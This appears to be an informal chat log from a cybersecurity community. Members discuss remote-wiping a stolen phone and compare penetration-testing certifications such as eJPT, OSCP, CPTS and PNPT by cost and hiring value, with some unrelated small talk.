I can see the appeal. if there is no hope of recovery, making it so the thief can't use the phone feels good

Well they can still use it...with a new account

wouldn't you just call your phone provider?

service

While Stealy McStealface racks up a bill calling the talking clock in Korea?

and you don't have a phone, so harder to call them

😄

never thought about that lmao

not if you brick it

Morning!

I don't think the feature is to remote brick it

Erase, not brick

then whats the point if the bad guy can still use your phone?

Don’t enable it on your device, use 2FA, have a secure password.

Your friend has been compromised. Also you can’t erase the device remotely, only lock it

i get the erasing the data but

You erase all your sensitive data

oh, I thought you could fully brick it

I stand corrected, you can erase the device

?

thats when you call your provider

Or... just don't have sensitive data

my guess is you would erase

and then call your provider to shut it down

incase it got stolen

of course

i can run whatever os i want on an asus chromebook right ?

There's a difference between your phone as in the mobile network provider and your phone as in an actual device to use

hm

yeah i never had to do any of this so its new to me

interesting tho

hopefully i wont ever have to

welp hope your friend figures it out

ye his phone got resetted lol, I just know that if we have someone email then we can reset another phone on that email too

And let me congratulate you on having a friend 😄

(i'm just salty cos my 2 besties and their kids (my godkids) are in Canada for the next 1.5 years)

welp the years fly by

I am kinda yeah. I like having multiple certs from different vendors

Isn't it a bit of redundant?

Mknukn i bought this is how they tell me the world ends

NICE how is it so far for youu

Can be. Some jobs look for one others look for another

awsome

its a really cool book\

I never see an issue with having both. My eJPT expires after 3 years. I’d like to have one PT cert before it does

Do the older ones expire?

EJPT expires after 3 years. After elearn took@over I think they required a retest as their exam changed

Ok, I understand that, isn't it then more beneficial for you to take one thats looked for the most

Which would be

OSCP? Lake

***

That would depend on your local area

Not but for real I’d say most likely cpts or offsec certs

CPTS is I think is the best bang for your buck

I'd say it goes like CPTS > OSCP > PNPT

ill send it later

Like you said Tcm is newer and lesser knownst so it wouldn’t get as much recog

You. An run any os on any machine as long as it’s compatible with the sys reqs

No not really, I just think the course is bad for what you get

Oh dam really

From people I’d spoke to they all seem to put the point across that OSCP is a huge shortcut to getting hired, you’d say the same about CPTS?

the TCM community are great aswell.

I’ve also heard from many that OSCP is dated

Can’t be as bad as ceh 😂

I can't really say much but I think the CPTS is one of the best courses you can buy for its price point

One use of msf in the entire exam and it has tool restrictions

Yeah can’t go wrong for 200

OSCP is also good, I don't think its dated, it was also recently updated and when I took it, the content was enough to pass

I can’t justify 2000 dollars for a cert right now tbh

Thanks man, my university is putting me through CEH this year but was looking into ejpt & oscp as well. Will look into cpts:)

Gave +1 Rep to @simple valve (current: #24 - 344)

Mu sound system in my car isn't working 😭😭

I understand that, OffSec has steep price points for individual learners

Wait on ejpt they are revamping the w tire course

Time for da Bluetooth speaker in da car

They’re removing one guy completely from it and adding a few things to ejpt

Eh, they just revamped it right? What made them revamp it again...

Aight man. What version of ejpt are we on? Still v2? 😂

Oh they’re still in the process of removing neat guy

More like getting enough power for my sub to work

Heard so much shit talk about ejpt but I like the sound about it

He had like 50-60 % of the core materials that everyone skipped because he was so boring

Ejpt will be 100% alexi now

Josh mason that’s the guy they’re kicking him out

What you wired it to?

Should be fine from any accessory live

It's my new battery I just switched to, thought it had enough power like my old, but guess not

Ahh that’s a shame. Still have warranty on the battery to get a replacement if it’s new :)

Yeah, it's not even weeks old :/

eJPT is bad bc the standard entry level for pentesting certs has been way higher (e.g. OSCP, eCPPTv2, PNPT, CPTS, etc.)

Can confirm..

I’d say it’s good for those JUST learning or testing. But wait till Black Friday sales

I bought my voucher and course for like 100 bucks